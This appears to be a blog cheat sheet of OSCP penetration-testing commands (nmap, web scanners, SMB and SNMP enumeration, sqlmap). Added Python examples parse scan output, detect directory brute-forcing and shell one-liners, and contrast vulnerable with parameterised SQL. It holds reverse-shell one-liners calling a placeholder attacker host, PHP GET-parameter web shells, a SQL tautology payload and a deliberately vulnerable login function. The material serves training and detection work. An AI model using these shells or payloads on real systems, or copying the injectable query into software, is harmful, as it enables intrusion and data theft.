In a previous article we shared a wide range of tools for sub-domain enumeration, which help pentesters and bug hunters collect subdomains for the domain they are targeting.

Enumeration is the most important thing you can do: at the inevitable stage where you find yourself hitting a wall, 90% of the time it will be because you haven't done enough enumeration.

There are a ton of certifications in the hacking and security domain, but Offensive Security certifications are the ones that will really make you feel you have earned it, rather than just crossed your fingers and taken a multiple-choice exam.

Yes, we're talking about OSCP (Offensive Security Certified Professional). The OSCP preparation, lab and exam are an awesome journey in which you will experience lots of excitement, pain, suffering, frustration, confidence and motivation, and where learning is constant throughout.

Below are a few commands that are very helpful for OSCP preparation:

Nmap Commands

[#] Quick TCP Scan

Command: nmap -sC -sV -vv -oA quick <target>

[#] Quick UDP Scan

Command: nmap -sU -sV -vv -oA quick_udp <target>

[#] Full TCP Scan

Command: nmap -sC -sV -p- -vv -oA full <target>
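Because -oA writes <basename>.nmap, .gnmap and .xml, the XML file is the easiest to post-process. The Python script below is an added example, not code from the original article: it parses the XML produced by the quick and full scans above and lists the open ports the quick (default top-1000) scan missed, which is the reason for running the -p- scan at all. The two XML snippets and the host 10.0.0.5 are constructed for the example and only mimic nmap's real output format.

```python
"""Post-process nmap -oA output: parse the .xml files from the quick and
full scans and report which open ports the quick scan missed.
The XML below mimics nmap's format but is constructed for this example."""
import xml.etree.ElementTree as ET

# Constructed stand-in for quick.xml (top-1000 ports).
QUICK_XML = """<nmaprun scanner="nmap" args="nmap -sC -sV -vv -oA quick 10.0.0.5">
<host><status state="up"/><address addr="10.0.0.5" addrtype="ipv4"/>
<ports>
<port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH" version="7.4"/></port>
<port protocol="tcp" portid="25"><state state="filtered"/><service name="smtp"/></port>
<port protocol="tcp" portid="80"><state state="open"/><service name="http" product="Apache httpd" version="2.4.6"/></port>
</ports></host></nmaprun>"""

# Constructed stand-in for full.xml (-p-, all 65535 ports).
FULL_XML = """<nmaprun scanner="nmap" args="nmap -sC -sV -p- -vv -oA full 10.0.0.5">
<host><status state="up"/><address addr="10.0.0.5" addrtype="ipv4"/>
<ports>
<port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH" version="7.4"/></port>
<port protocol="tcp" portid="80"><state state="open"/><service name="http" product="Apache httpd" version="2.4.6"/></port>
<port protocol="tcp" portid="8080"><state state="open"/><service name="http-proxy"/></port>
<port protocol="tcp" portid="31337"><state state="closed"/></port>
</ports></host></nmaprun>"""


def parse_nmap_xml(xml_text):
    """Return {host_ip: {(proto, port): 'name product version'}} for open ports only."""
    root = ET.fromstring(xml_text)
    result = {}
    for host in root.findall("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            continue
        services = {}
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # skip filtered/closed ports
            key = (port.get("protocol"), int(port.get("portid")))
            svc = port.find("service")
            parts = [] if svc is None else [svc.get(a) for a in ("name", "product", "version")]
            services[key] = " ".join(p for p in parts if p)
        result[addr_el.get("addr")] = services
    return result


def missed_by_quick(quick, full):
    """Open ports in the full scan that the quick scan did not report, per host."""
    missed = {}
    for ip, svcs in full.items():
        seen = quick.get(ip, {})
        extra = {k: v for k, v in svcs.items() if k not in seen}
        if extra:
            missed[ip] = extra
    return missed


if __name__ == "__main__":
    quick = parse_nmap_xml(QUICK_XML)
    full = parse_nmap_xml(FULL_XML)
    for ip, ports in missed_by_quick(quick, full).items():
        for (proto, port), svc in sorted(ports.items()):
            print(f"{ip} {port}/{proto} {svc}  (open, missed by quick scan)")
```

On a real engagement replace the two string constants with `open("quick.xml").read()` and `open("full.xml").read()`; the parsing logic is the same because only the port list differs between the two runs.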

Web Scanning

[#] Nikto

Command: nikto -h <url>

[#] Dirsearch

Command: python dirsearch.py -u <url> -e php,txt,html,log,conf,cfg,ini,pdf -x 301,403,503,302 --random-agent

[#] Directory Buster

Command: dirb <url> /usr/share/wordlists/dirb/common.txt

[#] Whatweb

Command: whatweb -v -a 3 <url>

[#] Gobuster

Command: gobuster -e -u <url> -w /usr/share/wordlists/dirb/common.txt

[#] Wfuzz

Command: wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/common.txt --hc 404 <url>/FUZZ

[#] WPScan

Command: wpscan -u <url>

[#] Joomscan

Command: joomscan -u <url>
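The directory brute-forcers above (dirb, dirsearch, gobuster, wfuzz) all leave the same footprint on the target: one client requesting hundreds of wordlist paths and collecting mostly 404s. The Python script below is an added example from the defender's side, not code from the original article: it parses a few access-log lines in the common/combined format, counts 404 responses per client address and flags clients above a threshold. The log lines, addresses and paths are constructed for the example.

```python
"""Flag directory brute-forcing in a web access log: one client producing a
burst of 404 responses. Log lines below are constructed for this example."""
import re
from collections import Counter

# Apache/nginx combined log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)

# Constructed sample: 10.0.0.9 walks a wordlist, 10.0.0.20 is a normal visitor.
SAMPLE_ACCESS_LOG = [
    '10.0.0.9 - - [10/Oct/2019:13:55:36 +0000] "GET /admin HTTP/1.1" 404 209 "-" "Mozilla/5.0 (compatible)"',
    '10.0.0.9 - - [10/Oct/2019:13:55:36 +0000] "GET /backup HTTP/1.1" 404 209 "-" "Mozilla/5.0 (compatible)"',
    '10.0.0.9 - - [10/Oct/2019:13:55:36 +0000] "GET /cgi-bin/ HTTP/1.1" 404 209 "-" "Mozilla/5.0 (compatible)"',
    '10.0.0.9 - - [10/Oct/2019:13:55:37 +0000] "GET /config HTTP/1.1" 404 209 "-" "Mozilla/5.0 (compatible)"',
    '10.0.0.9 - - [10/Oct/2019:13:55:37 +0000] "GET /db HTTP/1.1" 404 209 "-" "Mozilla/5.0 (compatible)"',
    '10.0.0.9 - - [10/Oct/2019:13:55:37 +0000] "GET /robots.txt HTTP/1.1" 200 68 "-" "Mozilla/5.0 (compatible)"',
    '10.0.0.9 - - [10/Oct/2019:13:55:37 +0000] "GET /test.php HTTP/1.1" 404 209 "-" "Mozilla/5.0 (compatible)"',
    '10.0.0.20 - - [10/Oct/2019:13:56:01 +0000] "GET /index.php HTTP/1.1" 200 4821 "-" "Mozilla/5.0"',
    '10.0.0.20 - - [10/Oct/2019:13:56:01 +0000] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
    'this line is not in combined log format and is skipped',
]


def parse_line(line):
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def not_found_counts(lines):
    """Count 404 responses per client IP, ignoring unparseable lines."""
    counts = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec and rec["status"] == "404":
            counts[rec["ip"]] += 1
    return counts


def flag_bruteforce(lines, threshold=5):
    """Client IPs with at least `threshold` 404s in the given lines, sorted."""
    return sorted(ip for ip, n in not_found_counts(lines).items() if n >= threshold)


if __name__ == "__main__":
    for ip, n in not_found_counts(SAMPLE_ACCESS_LOG).most_common():
        print(f"{ip}: {n} x 404")
    print("flagged:", flag_bruteforce(SAMPLE_ACCESS_LOG))
```

In production you would count per IP within a sliding time window rather than over the whole file, but the per-client 404 ratio is the signal that all of the tools listed above produce regardless of their user-agent or wordlist.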

Port Checking

[#] Netcat Banner Grabbing

Command: nc -v <ip> <port>

[#] Telnet Banner Grabbing

Command: telnet <ip> <port>


[#] SMB Vulnerability Scan

Command: nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse <ip>

[#] SMB Users & Shares Scan

Command: nmap -p 445 -vv --script=smb-enum-shares.nse,smb-enum-users.nse <ip>

[#] Enum4linux

Command: enum4linux -a <ip>

[#] Null connect

Command: rpcclient -U "" <ip>

[#] Connect to SMB share

Command: smbclient //MOUNT/share


[#] SNMP Enumeration

Command: snmp-check -c public <ip>

Python Servers

[#] Simple Web Server

Command: python -m SimpleHTTPServer 80 (Python 2; on Python 3 the equivalent is python3 -m http.server 80)

[#] FTP Server

Command: python -m pyftpdlib -p 21 -w

Reverse Shells

[#] Bash Shell

Command: bash -i >& /dev/tcp/<ip>/<port> 0>&1

[#] Netcat linux

Command: nc -e /bin/sh <ip> 4443

[#] Netcat windows

Command: nc -e cmd.exe <ip> 4443


[#] PHP command Injection with system from GET Request

Command: <?php echo system($_GET["cmd"]);?>

[#] PHP Command Injection with Shell Exec from GET Request

Command: <?php echo shell_exec($_GET["cmd"]);?>
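The reverse-shell one-liners in the Reverse Shells section and the PHP GET-parameter shells just above are short, fixed strings, which also makes them easy to fingerprint from the defender's side. The Python script below is an added example, not code from the original article: it runs a few regular-expression signatures over constructed process command lines (as an auditd or EDR agent might record them) and over constructed PHP sources from a web root, and reports which entries match. The log lines, file paths and the address 10.0.0.9 are constructed for the example.

```python
"""Detection example for the reverse-shell one-liners and the PHP one-liner
web shells in this cheat sheet. All sample data below is constructed."""
import re

# Signatures for the reverse-shell command lines listed above.
PROCESS_RULES = {
    "bash_dev_tcp": re.compile(r"bash\s+-i\s+>&\s*/dev/tcp/\S+"),
    "netcat_exec": re.compile(r"\bnc(?:\.exe)?\b.*\s-e\s+(?:/bin/(?:ba)?sh|cmd\.exe)"),
}

# Signature for PHP that hands a request parameter straight to a shell.
PHP_RULES = {
    "php_shell_from_request": re.compile(
        r"\b(?:system|shell_exec|exec|passthru)\s*\(\s*\$_(?:GET|POST|REQUEST)\b"
    ),
}

# Constructed process command lines, in a simplified auditd/EDR style.
SAMPLE_PROCESS_LOG = [
    "pid=4121 user=www-data cmd=bash -i >& /dev/tcp/10.0.0.9/4443 0>&1",
    "pid=4130 user=www-data cmd=nc -e /bin/sh 10.0.0.9 4443",
    "pid=4140 user=root cmd=nc -zv 10.0.0.9 80",
    "pid=4150 user=alice cmd=bash -c ls -la /var/www",
]

# Constructed web-root files (path -> contents).
SAMPLE_PHP_FILES = {
    "/var/www/html/uploads/img.php": '<?php echo system($_GET["cmd"]);?>',
    "/var/www/html/tools.php": '<?php echo shell_exec($_GET["cmd"]);?>',
    "/var/www/html/index.php": '<?php echo htmlspecialchars($_GET["name"]); ?>',
}


def scan_process_lines(lines):
    """Return (rule_name, line) for each command line matching a reverse-shell signature."""
    hits = []
    for line in lines:
        for name, pattern in PROCESS_RULES.items():
            if pattern.search(line):
                hits.append((name, line))
    return hits


def scan_php_sources(files):
    """Return (rule_name, path) for each PHP file that pipes request input into a shell."""
    hits = []
    for path, source in files.items():
        for name, pattern in PHP_RULES.items():
            if pattern.search(source):
                hits.append((name, path))
    return hits


if __name__ == "__main__":
    for rule, line in scan_process_lines(SAMPLE_PROCESS_LOG):
        print(f"[process] {rule}: {line}")
    for rule, path in scan_php_sources(SAMPLE_PHP_FILES):
        print(f"[file]    {rule}: {path}")
```

The benign entries (a port check with nc -zv, a bash -c ls, and a PHP file that only echoes an escaped parameter) are there to show that the signatures key on the shell-spawning part of the command, not on the tool name alone; a web server user such as www-data spawning any interactive shell is the higher-level signal to alert on.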

SQL Injection

[#] SQL Injection Exploitation with Sqlmap

Command: sqlmap -u <url> --dbs
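What sqlmap automates is finding inputs that change the structure of a query built from untrusted strings. The Python snippet below is an added example, not code from the original article: using the standard-library sqlite3 module it shows a login query built by string formatting beside its parameterised form, and runs the classic tautology payload against both. The table, user, password and payload are constructed for the example.

```python
"""Vulnerable vs. parameterised login query, using Python's built-in sqlite3.
The table, user and payload below are constructed for this example."""
import sqlite3

# Classic tautology payload; sqlmap's job is to discover and tune such inputs automatically.
TAUTOLOGY = "' OR '1'='1"


def make_db():
    """In-memory database with one constructed user."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct-horse')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Builds SQL by string formatting: attacker-controlled quotes rewrite the query."""
    query = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    return [row[0] for row in conn.execute(query)]


def login_safe(conn, username, password):
    """Bound parameters: the driver passes values separately, so quotes stay data."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(query, (username, password))]


def demo():
    """Run both versions with valid credentials and with the payload as password."""
    conn = make_db()
    return {
        "vuln_valid": login_vulnerable(conn, "alice", "correct-horse"),
        "vuln_payload": login_vulnerable(conn, "nobody", TAUTOLOGY),
        "safe_valid": login_safe(conn, "alice", "correct-horse"),
        "safe_payload": login_safe(conn, "nobody", TAUTOLOGY),
    }


if __name__ == "__main__":
    for case, rows in demo().items():
        print(f"{case}: {rows}")
```

With the payload as password, the formatted query becomes `... WHERE username = 'nobody' AND password = '' OR '1'='1'`, which is true for every row, so the vulnerable function logs in as alice with no valid credentials; the parameterised version compares the literal string and returns nothing. The fix on the application side is always the second form, whatever the database engine.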

